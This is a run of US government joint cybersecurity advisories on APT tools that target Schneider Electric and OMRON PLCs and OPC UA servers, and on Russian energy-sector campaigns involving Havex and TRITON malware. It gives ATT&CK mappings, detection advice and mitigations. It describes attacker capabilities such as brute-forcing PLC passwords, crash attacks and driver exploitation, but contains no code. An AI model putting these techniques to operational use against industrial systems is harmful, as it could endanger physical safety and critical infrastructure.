The APT actors’ tools have a modular architecture and enable cyber actors to conduct highly automated exploits against targeted devices. The tools have a virtual console with a command interface that mirrors the interface of the targeted ICS/SCADA device. Modules interact with targeted devices, enabling operations by lower-skilled cyber actors to emulate higher-skilled actor capabilities.

The APT actors can leverage the modules to scan for targeted devices, conduct reconnaissance on device details, upload malicious configuration/code to the targeted device, back up or restore device contents, and modify device parameters. 

In addition, the APT actors can use a tool that installs and exploits a known-vulnerable ASRock-signed motherboard driver, AsrDrv103.sys, exploiting CVE-2020-15368 to execute malicious code in the Windows kernel. Successful deployment of this tool can allow APT actors to move laterally within an IT or OT environment and disrupt critical devices or functions.

APT Tool for Schneider Electric Devices  

The APT actors’ tool for Schneider Electric devices has modules that interact via normal management protocols and Modbus (TCP 502). Modules may allow cyber actors to:

  • Run a rapid scan that identifies all Schneider PLCs on the local network via User Datagram Protocol (UDP) multicast with a destination port of 27127 (Note: UDP 27127 is a standard discovery scan used by engineering workstations to discover PLCs and may not be indicative of malicious activity);
  • Brute-force Schneider Electric PLC passwords using CODESYS and other available device protocols via UDP port 1740 against defaults or a dictionary word list (Note: this capability may work against other CODESYS-based devices depending on individual design and function, and this report will be updated as more information becomes available); 
  • Conduct a denial-of-service attack to prevent network communications from reaching the PLC;
  • Sever connections, requiring users to re-authenticate to the PLC, likely to facilitate capture of credentials; 
  • Conduct a ‘packet of death’ attack to crash the PLC until a power cycle and configuration recovery is conducted; and 
  • Send custom Modbus commands (Note: this capability may work against Modbus other than in Schneider Electric PLCs).

Refer to the appendix for tactics, techniques, and procedures (TTPs) associated with this tool.

APT Tool for OMRON 

The APT actors’ tool for OMRON devices has modules that can interact by:

  • Scanning for OMRON using (Factory Interface Network Service (FINS) protocol;
  • Parsing the Hypertext Transfer Protocol (HTTP) response from OMRON devices;
  • Retrieving the media access control (MAC) address of the device;
  • Polling for specific devices connected to the PLC;
  • Backing up/restoring arbitrary files to/from the PLC; and
  • Loading a custom malicious agent on OMRON PLCs for additional attacker-directed capability.

Additionally, the OMRON modules can upload an agent that allows a cyber actor to connect and initiate commands—such as file manipulation, packet captures, and code execution—via HTTP and/or Hypertext Transfer Protocol Secure (HTTPS). 

Refer to the appendix for TTPs associated with this tool.

APT Tool for OPC UA 

The APT actors’ tool for OPC UA has modules with basic functionality to identify OPC UA servers and to connect to an OPC UA server using default or previously compromised credentials. The client can read the OPC UA structure from the server and potentially write tag values available via OPC UA.

Refer to the appendix for TTPs associated with this tool.

Mitigations

Note: these mitigations are provided to enable network defenders to begin efforts to protect systems and devices from new capabilities. They have not been verified against every environment and should be tested prior to implementing.

DOE, CISA, NSA, and the FBI recommend all organizations with ICS/SCADA devices implement the following proactive mitigations:

  • Isolate ICS/SCADA systems and networks from corporate and internet networks using strong perimeter controls, and limit any communications entering or leaving ICS/SCADA perimeters. 
  • Enforce multifactor authentication for all remote access to ICS networks and devices whenever possible.
  • Have a cyber incident response plan, and exercise it regularly with stakeholders in IT, cybersecurity, and operations.
  • Change all passwords to ICS/SCADA devices and systems on a consistent schedule, especially all default passwords, to device-unique strong passwords to mitigate password brute force attacks and to give defender monitoring systems opportunities to detect common attacks.
  • Maintain known-good offline backups for faster recovery upon a disruptive attack, and conduct hashing and integrity checks on firmware and controller configuration files to ensure validity of those backups. 
  • Limit ICS/SCADA systems’ network connections to only specifically allowed management and engineering workstations.
  • Robustly protect management systems by configuring Device Guard, Credential Guard, and Hypervisor Code Integrity (HVCI). Install Endpoint Detection and Response (EDR) solutions on these subnets and ensure strong anti-virus file reputation settings are configured.
  • Implement robust log collection and retention from ICS/SCADA systems and management subnets.
  • Leverage a continuous OT monitoring solution to alert on malicious indicators and behaviors, watching internal systems and communications for known hostile actions and lateral movement. For enhanced network visibility to potentially identify abnormal traffic, consider using CISA’s open-source Industrial Control Systems Network Protocol Parsers (ICSNPP).
  • Ensure all applications are only installed when necessary for operation. 
  • Enforce principle of least privilege. Only use admin accounts when required for tasks, such as installing software updates. 
  • Investigate symptoms of a denial of service or connection severing, which exhibit as delays in communications processing, loss of function requiring a reboot, and delayed actions to operator comments as signs of potential malicious activity.
  • Monitor systems for loading of unusual drivers, especially for ASRock driver if no ASRock driver is normally used on the system. 
Resources

For additional guidance on securing OT devices, see 

For more information on APT actors’ tools and TTPs, refer to: 

Disclaimer

The information in this report is being provided “as is” for informational purposes only. DOE, CISA, NSA, and the FBI do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the DOE, CISA, NSA, or the FBI, and this guidance shall not be used for advertising or product endorsement purposes.

Acknowledgements

The DOE, CISA, NSA, and the FBI would like to thank Dragos, Mandiant, Microsoft, Palo Alto Networks, and Schneider Electric for their contributions to this joint CSA.

Appendix: APT Cyber Tools Tactics, Techniques, and Procedures

See tables 1 through 3 for TTPs associated with the cyber actors’ tools described in this CSA mapped to the MITRE ATT&CK for ICS framework. See the ATT&CK for ICS framework for all referenced threat actor tactics and techniques.

Table 1: APT Tool for Schneider Electric ICS TTPs

Tactic Technique Execution Command-Line Interface [T0807] Scripting [T0853] Persistence Modify Program [T0889] System Firmware [T0857] Valid Accounts [T0859] Discovery Remote System Discovery [T0846] Remote System Information Discovery [T0888] Lateral Movement Default Credentials [T0812] Program Download [T0843] Valid Accounts [T0859] Collection Monitor Process State [T0801] Program Upload [T0845] Monitor Process State [T0801] Command and Control Commonly Used Port [T0885] Standard Application Layer Protocol [T0869] Inhibit Response Function Block Reporting Message [T0804] Block Command Message [T0803] Denial of Service [T0814] Data Destruction [T0809] Device Restart/Shutdown [T0816] System Firmware [T0857] Impair Process Control Modify Parameter [T0836] Unauthorized Command Message [T0855] Impact Denial of Control [T0813] Denial of View [T0815] Loss of Availability [T0826] Loss of Control [T0827] Loss of Productivity and Revenue [T0828] Manipulation of Control [T0831] Theft of Operational Information [T0882]

 

Table 2: APT Tool for OMRON ICS TTPs

Tactic Technique Initial Access Remote Services [T0886] Execution Command-Line Interface [T0807] Scripting [T0853] Change Operating Mode [T0858] Modify Controller Tasking [T0821] Native API [T0834] Persistence Modify Program [T0889] Valid Accounts [T0859] Evasion Change Operating Mode [T0858] Discovery  Network Sniffing [T0842] Remote System Discovery [T0846] Remote System Information Discovery [T0888] Lateral Movement Default Credentials [T0812] Lateral Tool Transfer [T0867] Program Download [T0843] Remote Services [T0886] Valid Accounts [T0859] Collection Detect Operating Mode [T0868] Monitor Process State [T0801] Program Upload [T0845] Command and Control Commonly Used Port [T0885] Standard Application Layer Protocol [T0869] Inhibit Response Function Service Stop [T0881] Impair Process Control Modify Parameter [T0836] Unauthorized Command Message [T0855] Impact Damage to Property [T0879] Loss of Safety [T0837] Manipulation of Control [T0831] Theft of Operational Information [T0882]

 

Table 3: APT Tool for OPC UA ICS TTPs

Tactic Technique Execution Command-Line Interface [T0807] Scripting [T0853] Persistence Valid Accounts [T0859] Discovery Remote System Discovery [T0846] Remote System Information Discovery [T0888] Lateral Movement Valid Accounts [T0859] Collection Monitor Process State [T0801] Point & Tag Identification [T0861] Command and Control Commonly Used Port [T0885] Standard Application Layer Protocol [T0869] Impact Manipulation of View [T0832] Theft of Operational Information [T0882] Contact Information

All organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at report@cisa.gov or (888) 282-0870 and/or to the FBI via your local FBI field office or the FBI’s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. For NSA client requirements or general cybersecurity inquiries, contact the Cybersecurity Requirements Center at 410-854-4200 or Cybersecurity_Requests@nsa.gov

Revisions
  • April 13, 2022: Initial Version
  • April 14. 2022: Added Resources

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: Security Alerts

AA22-083A: Tactics, Techniques, and Procedures of Indicted State-Sponsored Russian Cyber Actors Targeting the Energy Sector

US-CERT Security Alerts - Thu, 03/24/2022 - 06:00
Original release date: March 24, 2022
Summary

Actions to Take Today to Protect Energy Sector Networks:
• Implement and ensure robust network segmentation between IT and ICS networks.
• Enforce MFA to authenticate to a system.
• Manage the creation of, modification of, use of—and permissions associated with—privileged accounts.

This joint Cybersecurity Advisory (CSA)—coauthored by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Energy (DOE)—provides information on multiple intrusion campaigns conducted by state-sponsored Russian cyber actors from 2011 to 2018 and targeted U.S. and international Energy Sector organizations. CISA, the FBI, and DOE responded to these campaigns with appropriate action in and around the time that they occurred. CISA, the FBI, and DOE are sharing this information in order to highlight historical tactics, techniques, and procedures (TTPs) used by adversaries to target U.S. and international Energy Sector organizations.

On March 24, 2022, the U.S. Department of Justice unsealed indictments of three Russian Federal Security Service (FSB) officers and a Russian Federation Central Scientific Research Institute of Chemistry and Mechanics (TsNIIKhM) employee for their involvement in the following intrusion campaigns against U.S. and international oil refineries, nuclear facilities, and energy companies.[1]

  • Global Energy Sector Intrusion Campaign, 2011 to 2018: the FSB conducted a multi-stage campaign in which they gained remote access to U.S. and international Energy Sector networks, deployed ICS-focused malware, and collected and exfiltrated enterprise and ICS-related data. 
    • One of the indicted FSB officers was involved in campaign activity that involved deploying Havex malware to victim networks. 
    • The other two indicted FSB officers were involved in activity targeting U.S. Energy Sector networks from 2016 through 2018.
  • Compromise of Middle East-based Energy Sector organization with TRITON Malware, 2017: Russian cyber actors with ties to the TsNIIKhM gained access to and leveraged TRITON (also known as HatMan) malware to manipulate a foreign oil refinery’s ICS controllers. TRITON was designed to specifically target Schneider Electric’s Triconex Tricon safety systems and is capable of disrupting those systems. Schneider Electric has issued a patch to mitigate the risk of the TRITON malware’s attack vector; however, network defenders should install the patch and remain vigilant against these threat actors’ TTPs.
    • The indicted TsNIIKhM cyber actor is charged with attempt to access U.S. protected computer networks and to cause damage to an energy facility.
    • The indicted TsNIIKhM cyber actor was a co-conspirator in the deployment of the TRITON malware in 2017.

This CSA provides the TTPs used by indicted FSB and TsNIIKhM actors in cyber operations against the global Energy Sector. Specifically, this advisory maps TTPs used in the global Energy Sector campaign and the compromise of the Middle East-based Energy Sector organization to the MITRE ATT&CK for Enterprise and ATT&CK for ICS frameworks.

CISA, the FBI, and DOE assess that state-sponsored Russian cyber operations continue to pose a threat to U.S. Energy Sector networks. CISA, the FBI, and DOE urge the Energy Sector and other critical infrastructure organizations to apply the recommendations listed in the Mitigations section of this advisory and Appendix A to reduce the risk of compromise. 

For more information on Russian state-sponsored malicious cyber activity, see CISA's Russia Cyber Threat Overview and Advisories webpage. For more information on the threat of Russian state-sponsored malicious cyber actors to U.S. critical infrastructure as well as additional mitigation recommendations, see joint CSA Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure and CISA's Shields Up Technical Guidance webpage. 

Rewards for Justice Program

If you have information on state-sponsored Russian cyber operations targeting U.S. critical infrastructure, contact the Department of State’s (DOS) Rewards for Justice program. You may be eligible for a reward of up to $10 million, which DOS is offering for information leading to the identification or location of any person who, while acting under the direction or control of a foreign government, participates in malicious cyber activity against U.S. critical infrastructure in violation of the Computer Fraud and Abuse Act (CFAA). Contact +1-202-702-7843 on WhatsApp, Signal, or Telegram, or send information via the Rewards for Justice secure Tor-based tips line located on the Dark Web. For more details refer to rewardsforjustice.net.

Click here for a PDF version of this report. 

Technical Details

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 10, and the ATT&CK for ICSs framework. See the ATT&CK for Enterprise and ATT&CK for ICS frameworks for all referenced threat actor tactics and techniques.

Global Energy Sector Intrusion Campaign, 2011 to 2018

From at least 2011 through 2018, the FSB (also known as Berserk Bear, Energetic Bear, TeamSpy, Dragonfly, Havex, Crouching Yeti, and Koala) conducted an intrusion campaign against international and U.S. Energy Sector organizations. The threat actor gained remote access to and deployed malware designed to collect ICS-related information on compromised Energy Sector networks, and exfiltrated enterprise and ICS data.

Beginning in 2013 and continuing through 2014, the threat actor leveraged Havex malware on Energy Sector networks. The threat actor gained access to these victim networks via spearphishing emails, redirects to compromised websites, and malicious versions of legitimate software updates on multiple ICS vendor websites. The new software updates contained installations of Havex malware, which infected systems of users who downloaded the compromised updates.

Havex is a remote access Trojan (RAT) that communicates with a command and control (C2) server. The C2 server deploys payloads that enumerate all collected network resources and uses the Open Platform Communications (OPC) standard to gather information about connected control systems devices and resources within the network. Havex allowed the actor to install additional malware and extract data, including system information, lists of files and installed programs, e-mail address books, and virtual private network (VPN) configuration files. The Havex payload can cause common OPC platforms to crash, which could cause a denial-of-service condition on applications that rely on OPC communications. Note: for additional information on Havex, see to CISA ICS Advisory ICS Focused Malware and CISA ICS Alert ICS Focused Malware (Update A).

Beginning in 2016, the threat actor began widely targeting U.S. Energy Sector networks. The actor conducted these attacks in two stages: first targeting third-party commercial organizations (such as vendors, integrators, and suppliers) and then targeting Energy Sector organizations. The threat actor used the compromised third-party infrastructure to conduct spearphishing, watering hole, and supply chain attacks to harvest Energy Sector credentials and to pivot to Energy Sector enterprise networks. After obtaining access to the U.S. Energy Sector networks, the actor conducted network discovery, moved laterally, gained persistence, then collected and exfiltrated information pertaining to ICS from the enterprise, and possibly operational technology (OT), environments. Exfiltrated information included: vendor information, reference documents, ICS architecture, and layout diagrams.

For more detailed information on FSB targeting of U.S. Energy Sector networks, See CISA Alert Russian Government Cyber Activity Targeting Energy Sector and Other Critical Infrastructure Sectors.  

Refer to Appendix A for TTPs of Havex malware and TTPs used by the actor in the 2016 to 2018 targeting of U.S. Energy Sector networks, as well as associated mitigations.

Compromise of Middle East-based Energy Sector Organization with TRITON Malware, 2017

In 2017, Russian cyber actors with ties to TsNIIKhM gained access to and manipulated a foreign oil refinery’s safety devices. TsNIIKhM actors used TRITON malware on the ICS controllers, which resulted in the refinery shutting down for several days. 

TRITON is a custom-built, sophisticated, multi-stage malware affecting Schneider Electric’s Triconex Tricon, a safety programmable logic controller (PLC) (also referred to as a safety instrumented system [SIS]), which monitors industrial processes to prevent hazardous conditions. TRITON is capable of directly interacting with, remotely controlling, and compromising these safety systems. As these systems are used in a large number of environments, the capacity to disable, inhibit, or modify the ability of a process to fail safely could result in physical consequences. Note: for additional information on affected products, see to CISA ICS Advisory Schneider Electric Triconex Tricon (Update B).

TRITON malware affects Triconex Tricon PLCs by modifying in-memory firmware to add additional programming. The extra functionality allows an attacker to read/modify memory contents and execute custom code, disabling the safety system. 

TRITON malware has multiple components, including a custom Python script, four Python modules, and malicious shellcode that contains an injector and a payload. For detailed information on TRITON’s components, refer to CISA Malware Analysis Report (MAR): HatMan: Safety System Targeted Malware (Update B).

Note: the indicted TsNIIKhM cyber actor was also involved in activity targeting U.S. Energy Sector companies in 2018, and other TsNIIKhM-associated actors have targeted a U.S.-based company’s facilities in an attempt to access the company’s OT systems. To date, CISA, FBI, and DOE have no information to indicate these actors have intentionally disrupted any U.S. Energy Sector infrastructure. 

Refer to Appendix A for TTPs used by TRITON as well as associated mitigations. 

MitigationsEnterprise Environment

CISA, the FBI, and DOE recommend Energy Sector and other critical infrastructure organizations implement the following mitigations to harden their corporate enterprise network. These mitigations are tailored to combat multiple enterprise techniques observed in these campaigns (refer to Appendix A for observed TTPs and additional mitigations).

Privileged Account Management 
  • Manage the creation of, modification of, use of—and permissions associated with—privileged accounts, including SYSTEM and root.
Password Policies
  • Set and enforce secure password policies for accounts.
Disable or Remove Features or Programs
  • Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
Audit 
  • Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc., to identify potential weaknesses.
Operating System Configuration 
  • Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
Multifactor Authentication
  • Enforce multifactor authentication (MFA) by requiring users to provide two or more pieces of information (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.
Filter Network Traffic    
  • Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
Network Segmentation
  • Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a demilitarized zone (DMZ) to contain any internet-facing services that should not be exposed from the internal network.
Limit Access to Resources over the Network
  • Prevent access to file shares, remote access to systems, and unnecessary services. Mechanisms to limit access may include use of network concentrators, Remote Desktop Protocol (RDP) gateways, etc.
Execution Prevention
  • Block execution of code on a system through application control, and/or script blocking.
Industrial Control System Environment

CISA, the FBI, and DOE recommend Energy Sector and other critical infrastructure organizations implement the following mitigations to harden their ICS/OT environment.

Network Segmentation
  • Implement and ensure robust network segmentation between IT and ICS networks to limit the ability of cyber threat actors to move laterally to ICS networks if the IT network is compromised. 
    • Implement a network topology for ICS that has multiple layers, with the most critical communications occurring in the most secure and reliable layer. For more information refer to National Institute of Standard and Technology Special Publication 800-82: Guide to Industrial Control Systems (ICS) Security. Further segmentation should be applied to portions of the network that are reliant on one another by functionality. Figure 5 on page 26 of the CISA ICS Defense in Depth Strategy document describes this architecture.
    • Use one-way communication diodes to prevent external access, whenever possible.
    • Set up DMZs to create a physical and logical subnetwork that acts as an intermediary for connected security devices to avoid exposure.
    • Employ reliable network security protocols and services where feasible.
  • Consider using virtual local area networks (VLANs) for additional network segmentation, for example, by placing all printers in separate, dedicated VLANs and restricting users’ direct printer access. This same principle can be applied to segmentation of portions of the process for which devices are used. As an example, systems that are only involved in the creation of one component within an assembly line that is not directly related to another component can be on separate VLANs, which allows for identification of any unexpected communication, as well as segmentation against potential risk exposure on a larger scale.
  • Implement perimeter security between network segments to limit the ability of cyber threat actors to move laterally. 
    • Control traffic between network segments by using firewalls, intrusion detection systems (IDSs), and rules for filtering traffic on routers and switches.
    • Implement network monitoring at key chokepoints—including egress points to the internet, between network segments, core switch locations—and at key assets or services (e.g., remote access services).
    • Configure an IDS to create alarms for any ICS traffic outside normal operations (after establishing a baseline of normal operations and network traffic).
    • Configure security incident and event monitoring to monitor, analyze, and correlate event logs from across the ICS network to identify intrusion attempts.
ICS Best Practices
  • Update all software. Use a risk-based assessment strategy to determine which ICS networks, assets, and zones should participate in the patch management program. 
  • Test all patches in out-of-band testing environments before implementation into production environments.
  • Implement application allow listing on human machine interfaces and engineering workstations.
  • Harden software configuration on field devices, including tablets and smartphones.
  • Replace all end-of-life software and hardware devices.
  • Disable unused ports and services on ICS devices (after testing to ensure this will not affect ICS operation).
  • Restrict and manage remote access software. Enforce MFA for remote access to ICS networks.
  • Configure encryption and security for network protocols within the ICS environment.
  • Do not allow vendors to connect their devices to the ICS network. Use of a compromised device could introduce malware. 
  • Disallow any devices that do not live solely on the ICS environment from communicating on the platform. ‘Transient devices’ provide risk exposure to the ICS environment from malicious activity in the IT or other environments to which they connect.
  • Maintain an ICS asset inventory of all hardware, software, and supporting infrastructure technologies. 
  • Maintain robust host logging on critical devices within the ICS environment, such as jump boxes, domain controllers, repository servers, etc. These logs should be aggregated into a centralized log server for review. 
  • Ensure robust physical security is in place to prevent unauthorized personal from accessing controlled spaces that house ICS equipment.
  • Regularly test manual controls so that critical functions can be kept running if ICS/OT networks need to be taken offline.
Contact Information

All organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at report@cisa.gov or (888) 282-0870 and/or to the FBI via your local FBI field office or the FBI’s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov.

References

[1] https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical
[2] https://collaborate.mitre.org/attackics/index.php/Software/S0003 
[3] https://collaborate.mitre.org/attackics/index.php/Software/S0003
[4] https://collaborate.mitre.org/attackics/index.php/Software/S0013 

APPENDIX A: CAMPAIGN AND MALWARE TACTICS, TECHNIQUES, AND PROCEDURES Global Energy Sector Campaign: Havex Malware 

Table 1 maps Havex’s capabilities to the ATT&CK for Enterprise framework, and table 2 maps Havex’s capabilities to the ATT&CK for ICS framework. Table 1 also provides associated mitigations. For additional mitigations, refer to the Mitigations section of this advisory.

Table 1: Enterprise Domain Tactics and Techniques for Havex [2]

Tactic Technique Use Detection/Mitigations

Persistence [TA0003]

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001]

Havex adds Registry Run keys to achieve persistence.

Monitor: monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.

Privilege Escalation [TA0004]

Process Injection [T1055]

Note: this technique also applies to:

  • Tactic: Defense Evasion [TA0005]

Havex injects itself into explorer.exe.

Behavior Prevention on End Point: use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, Application Programming Interface (API) call, etc., behavior.

Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root.

Defense Evasion [TA0005]

Indicator Removal on Host: File Deletion [T1070.004]

Havex contains a cleanup module that removes traces of itself from victim networks.

Monitor: monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network, which an adversary could introduce. Some monitoring tools may collect command-line arguments but may not capture DEL commands since DEL is a native function within cmd.exe.

Credential Access [TA0006]

Credentials from Password Stores: Credentials from Web Browsers [T1555.003]

Havex may contain a publicly available web browser password recovery tool.

Password Policies: set and enforce secure password policies for accounts.

Discovery [TA0007]

Account Discovery: Email Account [T1087.003]

Havex collects address book information from Outlook

Monitor: monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation (WMI) and PowerShell.

File and Directory Discovery [T1083]

Havex collects information about available drives, default browser, desktop file list, My Documents, internet history, program files, and root of available drives.

Monitor: monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as WMI and PowerShell.

Process Discovery [T1057]

Havex collects information about running processes.

Monitor: normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as WMI and PowerShell.

System Information Discovery [T1082]

Havex collects information about the OS and computer name.

Monitor: monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as WMI and PowerShell.

In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations.

System Network Configuration Discovery [T1016]

Havex collects information about the internet adapter configuration.

Monitor: monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as WMI and PowerShell. System Owner/User Discovery [T1033] Havex collects usernames.

Collection [TA0009]

Archive Collected Data [T1560]

Havex writes collected data to a temporary file in an encrypted form before exfiltration to a C2 server.

Audit: audit or scan systems, permissions, insecure software, insecure configurations, etc., to identify potential weaknesses.

Command and Control [TA0011]

Data Encoding: Standard Encoding [T1132.001]

Havex uses standard Base64 + bzip2 or standard Base64 + reverse XOR + RSA-2048 to decrypt data received from C2 servers.

Detect: analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes using the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.

 

Table 2: ICS Domain Tactics and Techniques for Havex [3]

Tactic Technique Use Initial Access Spearphishing Attachment [T0865] Havex is distributed through a Trojanized installer attached to emails.

Supply Chain Compromise [T0862]

Note: this activity also applies to Tactic: Drive by Compromise [T0817]

Havex is distributed through Trojanized installers planted on compromised vendor websites. Execution User Execution [T0863] Execution of Havex relies on a user opening a Trojanized installer attached to an email. Discovery Remote System Discovery [T0846] Havex uses Windows networking (WNet) to discover all the servers, including OPC servers that are reachable by the compromised machine over the network. Remote System Information Discovery [T0888] Havex gathers server information, including CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth. Collection Automated Collection [T0802] Havex gathers information about connected control systems devices. Point & Tag Identification [T0861] Havex can enumerate OPC tags; specifically tag name, type, access, and ID. Inhibit Response Function Denial of Service [T0814] Havex has caused multiple common OPC platforms to intermittently crash.  Impact Denial of Control [T0813] Havex can cause PLCs inability to control connected systems.   Global Energy Sector Campaign: 2016 to 2018 U.S. Energy Sector Targeting

Table 3 maps the 2016 to 2018 U.S. Energy Sector targeting activity to the MITRE ATT&CK Enterprise framework. Mitigations for techniques are also provided in table. For additional mitigations, refer to the Mitigations section of this advisory.

Table 3: Energy Sector Campaign, 2016 to 2018 targeting U.S. Energy Sector: Observed MITRE ATT&CK Enterprise Tactics and Techniques

Tactic Technique Use  Detection/Mitigations Reconnaissance [TA0043] Gather Victim Identity Information: Credentials [T1589.001]

The threat actor harvested credentials of third-party commercial organizations by sending spearphishing emails that contained a PDF attachment. The PDF attachment contained a shortened URL that, when clicked, led users to a website that prompted the user for their email address and password.
The threat actor harvested credentials of Energy Sector targets by sending spearphishing emails with a malicious Microsoft Word document or links to the watering holes created on compromised third-party websites.

Note: this activity also applies to: 

  • Tactic: Reconnaissance [TA0043], Technique: Phishing for Information [T1598]:

Software Configuration: implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.

User Training: train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.

Resource Development [TA0042] Compromise Infrastructure: Server [T1584.004] The threat actor created watering holes on compromised third-party organizations’ domains. This activity typically takes place outside the visibility of target organizations, making detection of this behavior difficult. Ensure that users browse the internet securely. Prevent intentional and unintentional download of malware or rootkits, and users from accessing infected or malicious websites. Treat all traffic as untrusted, even if it comes from a partner website or popular domain. Initial Access [TA0001] Valid Accounts [T1078] The threat actor obtained access to Energy Sector targets by leveraging compromised third-party infrastructure and previously compromised Energy Sector credentials against remote access services and infrastructure—specifically VPN, RDP, and Outlook Web Access—where MFA was not enabled.

Network Segmentation: architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network.

MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.

Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root.

Update Software: perform regular software updates to mitigate exploitation risk.

Exploit Protection: use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.

Application Isolation and Sandboxing: restrict execution of code to a virtual environment on or in transit to an endpoint system.

External Remote Services [T1133] The threat actor installed VPN clients on compromised third-party targets to connect to Energy Sector networks.

Network Segmentation: architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network.

MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.

Limit Access to Resource Over Network: prevent access to file shares, remote access to systems, and unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.

Disable or Remove Program: remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.

Execution 
[TA0002] Command and Scripting Interpreter: PowerShell [T1059.001]

During an RDP session, the threat actor used a PowerShell Script to create an account within a victim’s Microsoft Exchange Server. 

Note: this activity also applies to: 

  • Tactic: Persistence [TA0003], Technique: Create Account: Local Account [T1136.001

Antivirus/Antimalware: use signatures or heuristics to detect malicious software.

Code Signing: enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.

Disable or Remove Program: remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.

Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root.

Command and Scripting Interpreter: Windows Command Shell [T1059.003]

The threat actor used a JavaScript with an embedded Command Shell script to:

  • Create a local administrator account; 
  • Disable the host-based firewall;
  • Globally open port 3389 for RDP access; and
  • Attempt to add the newly created account to the administrators group to gain elevated privileges. 

Note: this activity also applies to: 

  • Tactic: Credential Access [TA0006], Technique: Input Capture [T1056]
  • Tactic: Execution [TA0002], Technique: Command and Scripting Interpreter: JavaScript [T1059.007]
  • Tactic: Persistence [TA0003], Technique: Create Account: Local Account [T1136.001]
Execution Prevention: block execution of code on a system through application control, and/or script blocking. Scheduled Task/Job: Scheduled Task [T1053.005] The threat actor created a Scheduled Task to automatically log out of a newly created account every eight hours.

Audit: audit or scan systems, permissions, insecure software, insecure configurations, etc., to identify potential weaknesses.

Harden Operating System Configuration: make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.

Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root.

User Account Management: manage the creation of, modification of, use of, and permissions associated with user accounts.

Persistence [TA0003] Create Account: Local Account [T1136.001]  The threat actor created local administrator accounts on previously compromised third-party organizations for reconnaissance and to remotely access Energy Sector targets.    MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.

MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.

Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root.

